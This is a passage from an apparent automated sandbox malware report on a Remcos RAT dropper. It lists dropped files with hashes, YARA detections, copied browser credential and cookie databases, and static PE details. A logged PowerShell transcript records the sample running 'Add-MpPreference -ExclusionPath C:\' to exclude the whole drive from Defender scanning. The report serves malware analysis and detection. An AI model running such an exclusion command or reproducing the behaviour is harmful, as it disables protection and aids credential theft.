                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\SFPUSAFIOL.pdf
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1026
                                                                                              Entropy (8bit):4.696913287597031
                                                                                              Encrypted:false
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\SFPUSAFIOL.xlsx
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1026
                                                                                              Entropy (8bit):4.696913287597031
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:TEp0dGAR5tKV4V1dnQcncjGi20QoVwGQqh3:20Iw5tKOncjGUwra
                                                                                              MD5:44ECF9E98785299129B35CBDBCAB909B
                                                                                              SHA1:4D92AFB00FE614CC8B795F1AF28173DBE76FE7F5
                                                                                              SHA-256:06E706536CB7D543E6068C98C90721CAD89C23D16D37444F46F9B01C4380DF9E
                                                                                              SHA-512:1FA347223014BB3AC0106948B07E337B1A98C0BA2D98AC0ADD821D1B3CE9F75681F6383925F5E614F36750C5B9FB92D1C8EEEDC05469FBC6EA3F281D8B52B556
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\SQRKHNBNYN.docx
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1026
                                                                                              Entropy (8bit):4.699088014379539
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:iGmuvXb+mVV5Ule86OuFXvk64KaOMJQaJO7tZAWPN4rOnsK:/muvL+mP5Ule86OuraOMJZOHADqf
                                                                                              MD5:BF469DD8C21F5160EACD49BB59E9A370
                                                                                              SHA1:2CE4942C6CD2E22A644BAAFAED41DF9D0773477F
                                                                                              SHA-256:9ECF07708D59E0B3AE33ED553978F4B2BB806B2FB805296F73F9270C4AE01B84
                                                                                              SHA-512:FBBB805B4C65902C67F2F432BA20FFF689FABDB3652702FA176369107F688C43923C9D729095F313425847E14B138E61117ED6C03E582F82B6426BBC2C481380
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\SQRKHNBNYN.pdf
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1026
                                                                                              Entropy (8bit):4.699088014379539
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:iGmuvXb+mVV5Ule86OuFXvk64KaOMJQaJO7tZAWPN4rOnsK:/muvL+mP5Ule86OuraOMJZOHADqf
                                                                                              MD5:BF469DD8C21F5160EACD49BB59E9A370
                                                                                              SHA1:2CE4942C6CD2E22A644BAAFAED41DF9D0773477F
                                                                                              SHA-256:9ECF07708D59E0B3AE33ED553978F4B2BB806B2FB805296F73F9270C4AE01B84
                                                                                              SHA-512:FBBB805B4C65902C67F2F432BA20FFF689FABDB3652702FA176369107F688C43923C9D729095F313425847E14B138E61117ED6C03E582F82B6426BBC2C481380
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\UOOJJOZIRH.xlsx
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1026
                                                                                              Entropy (8bit):4.694311754777018
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:A8RGU2wNw6pbc5fP6UBtRzjn+4sNp3GYuf5/4dImDNR4+R00JOGJP89a:Aw4w9h+fiUBtJj+44pc3mDL4+R0MVJ/
                                                                                              MD5:61908250A5348CC047FF15260F730C2B
                                                                                              SHA1:CBCF34156EAE25B328A926E21008598EE8D1CBDE
                                                                                              SHA-256:8700BF8369D39FD5DF142F9482CE8860BD8A26A3304EFBC57CBF9E45782C7A3A
                                                                                              SHA-512:BCAB9A36BF1111B05BC52D8921CAC19ABC0FA18D93EA4EB9866DF4B31624FFCA2FF55A09C5051DC2AECAB18828BA8FDA5F31FA0F1E1B7CDC51DF39041E2A82F3
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\VAMYDFPUND.docx
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1026
                                                                                              Entropy (8bit):4.690028473124583
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:nCtOJ8AJzDzL/RXD03mp5reBXnqW8rdYu942ZCpjtJHU2coh:nsnA9/Z03y5qXnD0Yz0qjtJpN
                                                                                              MD5:1E5D6B27E451F2406E5ED97F51985EE1
                                                                                              SHA1:EDE59763DC7E1275594BDBB4EF90F9FEE78E946C
                                                                                              SHA-256:A239ED81C44DBF3A8F7F28604058DE45B82FB3D596779B6B889837B2FE34A886
                                                                                              SHA-512:619426DCC7B7C18488EC96D5474A5AA62EE4B1E7B52D8550B6A875AF0A19E02772D30142D9DC6986750732671605C7FF31E1F919CC6D121531ECBF0AE092E215
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\VAMYDFPUND.xlsx
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1026
                                                                                              Entropy (8bit):4.690028473124583
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:nCtOJ8AJzDzL/RXD03mp5reBXnqW8rdYu942ZCpjtJHU2coh:nsnA9/Z03y5qXnD0Yz0qjtJpN
                                                                                              MD5:1E5D6B27E451F2406E5ED97F51985EE1
                                                                                              SHA1:EDE59763DC7E1275594BDBB4EF90F9FEE78E946C
                                                                                              SHA-256:A239ED81C44DBF3A8F7F28604058DE45B82FB3D596779B6B889837B2FE34A886
                                                                                              SHA-512:619426DCC7B7C18488EC96D5474A5AA62EE4B1E7B52D8550B6A875AF0A19E02772D30142D9DC6986750732671605C7FF31E1F919CC6D121531ECBF0AE092E215
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\ZTGJILHXQB.docx
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1026
                                                                                              Entropy (8bit):4.699732953818543
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:84HnNFe3vxyUDFktK2hDYjqaULhRGcVtUEn3iQw3M2qh0eQZnT:JnNk34UDFOt6uashRFVtUEnSQwbrV
                                                                                              MD5:9790C04CE1F6B62202E4E959572AFFDF
                                                                                              SHA1:48829C582A89E6EC74BFD85E01D2B6D73DDE4931
                                                                                              SHA-256:20AB8AFF0DDCBA296F3A9F2D2997DC3BE893ABBDF3B8F177D00FF718FF810B7E
                                                                                              SHA-512:8A702E988A39A50F9E4B8ECDEE15BD8D2B42D7B64D26663787237B83D721C5609B6D43CF2CEBBE3F0E0F44B36744017567B0AE3EBA64E728210D791E35A0DBA2
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\LoginData
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                              Category:dropped
                                                                                              Size (bytes):40960
                                                                                              Entropy (8bit):0.792852251086831
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                              MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                              SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                              SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                              SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: SQLite format
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\SQLite3_StdCall.dll
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):60416
                                                                                              Entropy (8bit):6.476799607351969
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:iwxijL3LxouSmW7Z534ZO1z0/AgqWgjKDv01FoMRxrU:iwxiFNWdVOv/BijKavRK
                                                                                              MD5:D77B227A28A78627C2323CAC75948390
                                                                                              SHA1:E228C3951F2A9FD0FEBFE07390633AB4F35727F4
                                                                                              SHA-256:527EC201DCD7695BD9830EB82AB35A3986121DE9EA156193834AED9D79223B82
                                                                                              SHA-512:5627FBC8BBB98F644E21F101A68F0E0B07B87C264D00EA227286BED8AB6DD4EBF5114F03B632604F775FF93666A409A1A179A81EBFC9246956BA8150FF5B0587
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\WebData
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                              Category:dropped
                                                                                              Size (bytes):73728
                                                                                              Entropy (8bit):1.1874185457069584
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                              MD5:72A43D390E478BA9664F03951692D109
                                                                                              SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                              SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                              SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: SQLite format
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\cookies
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                              Category:dropped
                                                                                              Size (bytes):20480
                                                                                              Entropy (8bit):0.7006690334145785
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
                                                                                              MD5:A7FE10DA330AD03BF22DC9AC76BBB3E4
                                                                                              SHA1:1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
                                                                                              SHA-256:8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
                                                                                              SHA-512:1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: SQLite format 3
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\sqlite3.dll
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):599419
                                                                                              Entropy (8bit):6.490720742062744
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:OQwLOkFyRUXeqQg1vTuOv43WZfyy9IQoqyRHPvKftzTFJKs/:OetRUXeE1buOv4GZaQI9RHiJKs/
                                                                                              MD5:5405413FFF79B8D9C747AA900F60F082
                                                                                              SHA1:71CAF8907DDD9A3A25D71356BD2CE09BD293BD78
                                                                                              SHA-256:3E5A28FFDE07AC661C26B6CCF94E64C1C90B1F25B3B24C90605AA922B87642EB
                                                                                              SHA-512:2F09A30FC4DA5166BD665210FEFA1D44CE344F0EC6A37F127D677AEB3CA4FC0D09B7C9C1540F57DA1E3449B7F588A1C61115395E965FA153D4BAA5033266ED66
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              C:\Users\user\AppData\Roaming\Remcos\dwn.exe
                                                                                              Process:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):2351104
                                                                                              Entropy (8bit):7.506766900421548
                                                                                              Encrypted:false
                                                                                              SSDEEP:49152:AW3dW0e3O2oWFaLcZig+bnDPXqWtex9vtVl:AW3dWJloWFaLcZig+j2WcxLVl
                                                                                              MD5:32EB10C12A29B38F13730CD1F5DCAD4D
                                                                                              SHA1:4D0EB488A01FED1720483DFA270423BEA593CA14
                                                                                              SHA-256:06550442678FB92B0273B83F349D47D3654FB72A7D98398CE3B63E3635B8E8F1
                                                                                              SHA-512:1E95F1A74B7F2DCDE31B661AAD078373DD757B689EE02E35E36090777A1B92CF7564271FC577DF529C6E7C77B3D294CCE0FD913243A7DF6DC6ACC2F58C2FB6C5
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              Reputation:unknown
                                                                                              C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                                              Process:C:\Users\user\AppData\Local\Temp\rem9090sta.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):474112
                                                                                              Entropy (8bit):6.580639305620245
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:iegN0jfYLclGb0bVT6e+MT2MffZS/gISYo:ENywLclGIeMT2MXZRISV
                                                                                              MD5:083D4CDE33E6721F595A468BB7D17ADA
                                                                                              SHA1:0E2766C31F8DC69A320B6176D62F6784C9F590DD
                                                                                              SHA-256:F636FA169CBB4D9038EA21B5B1258A3AB92BE41BBAB0020C90C8ECBA105616E2
                                                                                              SHA-512:8565B2EFC06D92878E7BB86AB931237CAAA0BC0D10935F4D8380527A1370461C720ADA5B1815099FF4AC0230F203BD0A0BFE9391367CED380587B4C4C1FB04CE
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe, Author: Joe Security
                                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe, Author: unknown
                                                                                              Antivirus:
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              Reputation:unknown
                                                                                              C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                              Process:C:\Users\user\AppData\Local\Temp\5.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                              Category:dropped
                                                                                              Size (bytes):852277
                                                                                              Entropy (8bit):7.535786145318411
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:WOe0qo8EWUK1CLF54EMctn6zleqHXFD/ABuqYrNav+qSz4SglH2zbr:WpZwW9cxjn6z917Nq+BVcSg12r
                                                                                              MD5:3F332B62EEE0970F3189C689D5BD042A
                                                                                              SHA1:F68F7DCC8FFCDD3F93333E711779E8D02DB2DFAE
                                                                                              SHA-256:7C7983ADA08828EA0C0ED5B17B05F8DAD5BF6FA44E1A4692C37F18C340E14219
                                                                                              SHA-512:2399BF335B60B87D1126B7CD663DFD937BE0DA7FEF815225D53940E5D01CF4B02969DC33D75E7B1F5F63B3233ED1EA179CC517C1C4639802293E4EA8CF25D5EF
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              Reputation:unknown
                                                                                              C:\Users\user\AppData\Roaming\WindowsUpdate.exe
                                                                                              Process:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                              Category:dropped
                                                                                              Size (bytes):0
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:WOe0qo8EWUK1CLF54EMctn6zleqHXFD/ABuqYrNav+qSz4SglH2zbr:WpZwW9cxjn6z917Nq+BVcSg12r
                                                                                              MD5:3F332B62EEE0970F3189C689D5BD042A
                                                                                              SHA1:F68F7DCC8FFCDD3F93333E711779E8D02DB2DFAE
                                                                                              SHA-256:7C7983ADA08828EA0C0ED5B17B05F8DAD5BF6FA44E1A4692C37F18C340E14219
                                                                                              SHA-512:2399BF335B60B87D1126B7CD663DFD937BE0DA7FEF815225D53940E5D01CF4B02969DC33D75E7B1F5F63B3233ED1EA179CC517C1C4639802293E4EA8CF25D5EF
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              Reputation:unknown
                                                                                              C:\Users\user\AppData\Roaming\pid.txt
                                                                                              Process:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):0
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:t:t
                                                                                              MD5:0D770C496AA3DA6D2C3F2BD19E7B9D6B
                                                                                              SHA1:ECC8960598EECE6384E562B381C74ADBDF84C291
                                                                                              SHA-256:AFCBB3A0B0D252E8EB1F2BA0CCB8BAC1E5A93BEFEA32241BADFBD759713F30FA
                                                                                              SHA-512:5AEB4C71DA76745DEE7D655B996D9D05129B401EB339E474FE713A143CA11245376D52F81B1A54CBDDD2D2EA5AAEE9114DE12A69EC8894AF4DF026CC27BF4F16
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: 6084
                                                                                              C:\Users\user\AppData\Roaming\pidloc.txt
                                                                                              Process:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):0
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:oNt+kiEaKC59KYr4a:oNwknaZ534a
                                                                                              MD5:EAB5D702695BC09B3A1E675917747986
                                                                                              SHA1:CCB1F880801A3826B484428802F66BDCCEDFF0B6
                                                                                              SHA-256:9E90C44A450FAD02151EC509448B88382B55A7CDC65D32EA970B9AE13C909709
                                                                                              SHA-512:7328E450F4E3AE277F5F30BAFC0D7D73835AEC39544A999A2A6D08DC6A20BF83874D7D3C5D8B24764F0C432D9A4F0A697377E27E89A5A4FC260E9041D7CF2EA6
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                              C:\Users\user\AppData\Roaming\w.BmxDA.tmp
                                                                                              Process:C:\Users\user\AppData\Local\Temp\bin.exe
                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):87300
                                                                                              Entropy (8bit):6.102677495198111
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:CdLUGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR1:CdLUFcbXafIB0u1GOJmA3iuR1
                                                                                              MD5:D5D29F3050E6C920ECA7B7276AB537CE
                                                                                              SHA1:CE24853BBE0BCC044B2216385612CBA2A754E4D4
                                                                                              SHA-256:C0963F0007CBC3AA6AA3B9A906173730BB6B7644BE9D3DA903D64B42D4387FDB
                                                                                              SHA-512:3BB59E005958968218FF3763B831B8898C47A6543CD6B017D52DA9176DBE0D6D545F25FB901D11DA2B30D9BA86DCB59E0F295A9C1B14579C8B764849CFB76D8C
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              C:\Users\user\Documents\20211207\PowerShell_transcript.405464.W_BMIIUL.20211207133845.txt
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):5048
                                                                                              Entropy (8bit):5.3845993980278815
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:BZbj3N5tqDo1ZIZPj3N5tqDo1ZdM6UjZPj3N5tqDo1ZmFEEsZL:rYkV
                                                                                              MD5:7AB83A17940318100C5E2696D22145A0
                                                                                              SHA1:70CCC9767E81FAFC009E592E8452C57D2A66D609
                                                                                              SHA-256:9E269E1D1C01C9E2A987F1FB6B656F3464F3E795F35D9A5209AA749ABAFBE1B2
                                                                                              SHA-512:1CD46D2293F341B559FF2ED8B6278A787ABB56F56D5D08A8E03CAE20FE9F6AD84D05C42EEFB1D4FC23FD834319E04410B9566018D77C5173C103B316635F1C69
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20211207133852..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 405464 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -ExclusionPath C:\..Process ID: 6324..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211207133852..**********************..PS>Add-MpPreference -ExclusionPath C:\..**********************..Windows PowerShell transcript start..Start time: 20211207134354..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 405464 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -Exclus

                                                                                              Static File Info

                                                                                              General

                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                              Entropy (8bit):7.715929024340085
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                              • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                              File name:xxTzyGLZx5.exe
                                                                                              File size:833414
                                                                                              MD5:d5f570694f0847caea18ccac8837b052
                                                                                              SHA1:b509737bb61ae0e9dee56ca2706456b3788ce553
                                                                                              SHA256:ea209f6ba95920038ac83985be8bcffc1fda49631ed3142cfdd9f2acd52584b1
                                                                                              SHA512:d742bd5224e03e3cb7639676fab49577b34a0a0bf64359fd0851e7825d3e437d707dde7c4e93091d3fdcf4336a3125870eaead995b6645176f180c4936026068
                                                                                              SSDEEP:12288:O46yDv/k496AZOJnBH92K6UXi6ft27rNG1JbL1pywuWKDaFIMD+o4Sth:OvyQVA+d2K66fgZGDXmWyaFHDtHh

                                                                                              File Icon

                                                                                              Icon Hash:beeaccc8e8b29aae

                                                                                              Static PE Info

                                                                                              General

                                                                                              Entrypoint:0x4030e3
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                              DLL Characteristics:
                                                                                              Time Stamp:0x48EFCDCD [Fri Oct 10 21:49:01 2008 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:4
                                                                                              OS Version Minor:0
                                                                                              File Version Major:4
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:4
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:7fa974366048f9c551ef45714595665e

                                                                                              Entrypoint Preview

                                                                                              Instruction
                                                                                              sub esp, 00000180h
                                                                                              push ebx
                                                                                              push ebp
                                                                                              push esi
                                                                                              xor ebx, ebx
                                                                                              push edi
                                                                                              mov dword ptr [esp+18h], ebx
                                                                                              mov dword ptr [esp+10h], 00409158h
                                                                                              xor esi, esi
                                                                                              mov byte ptr [esp+14h], 00000020h
                                                                                              call dword ptr [00407030h]
                                                                                              push 00008001h
                                                                                              call dword ptr [004070B0h]
                                                                                              push ebx
                                                                                              call dword ptr [0040727Ch]
                                                                                              push 00000008h
                                                                                              mov dword ptr [0042EC18h], eax
                                                                                              call 00007F93C4A114F8h
                                                                                              mov dword ptr [0042EB64h], eax
                                                                                              push ebx
                                                                                              lea eax, dword ptr [esp+34h]
                                                                                              push 00000160h
                                                                                              push eax
                                                                                              push ebx
                                                                                              push 00428F90h
                                                                                              call dword ptr [00407158h]
                                                                                              push 0040914Ch
                                                                                              push 0042E360h
                                                                                              call 00007F93C4A111AFh
                                                                                              call dword ptr [004070ACh]
                                                                                              mov edi, 00434000h
                                                                                              push eax
                                                                                              push edi
                                                                                              call 00007F93C4A1119Dh
                                                                                              push ebx
                                                                                              call dword ptr [0040710Ch]
                                                                                              cmp byte ptr [00434000h], 00000022h
                                                                                              mov dword ptr [0042EB60h], eax
                                                                                              mov eax, edi
                                                                                              jne 00007F93C4A0E9DCh
                                                                                              mov byte ptr [esp+14h], 00000022h
                                                                                              mov eax, 00434001h
                                                                                              push dword ptr [esp+14h]
                                                                                              push eax
                                                                                              call 00007F93C4A10C90h
                                                                                              push eax
                                                                                              call dword ptr [0040721Ch]
                                                                                              mov dword ptr [esp+1Ch], eax
                                                                                              jmp 00007F93C4A0EA35h
                                                                                              cmp cl, 00000020h
                                                                                              jne 00007F93C4A0E9D8h
                                                                                              inc eax
                                                                                              cmp byte ptr [eax], 00000020h
                                                                                              je 00007F93C4A0E9CCh
                                                                                              cmp byte ptr [eax], 00000022h
                                                                                              mov byte ptr [eax+eax+00h], 00000000h

                                                                                              Rich Headers

                                                                                              Programming Language:
                                                                                              • [EXP] VC++ 6.0 SP5 build 8804

                                                                                              Data Directories

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x74b0 | 0xb4 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x37000 | 0x2b718 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x28c | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

                                                                                              Sections

| Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x5b68 | 0x5c00 | False | 0.67722486413 | data | 6.48746502716 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
| .rdata | 0x7000 | 0x129c | 0x1400 | False | 0.4337890625 | data | 5.04904254867 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x9000 | 0x25c58 | 0x400 | False | 0.58203125 | data | 4.76995537906 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
| .ndata | 0x2f000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ |
